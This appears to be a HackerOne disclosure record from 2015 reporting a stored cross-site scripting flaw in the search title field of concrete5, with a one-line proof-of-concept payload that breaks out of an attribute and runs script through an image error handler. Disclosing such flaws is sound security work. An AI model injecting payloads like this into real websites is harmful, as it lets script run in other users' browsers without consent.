concrete5: Stored XSS on Search Title

2015-03-08T08:56:11
ID H1:50556
Type hackerone
Reporter ishahriyar
Modified 2015-07-08T18:33:07

Description

An XSS payload can be executed and saved permanently in the search title.

PoC code: "><img src=x onerror=alert(1)>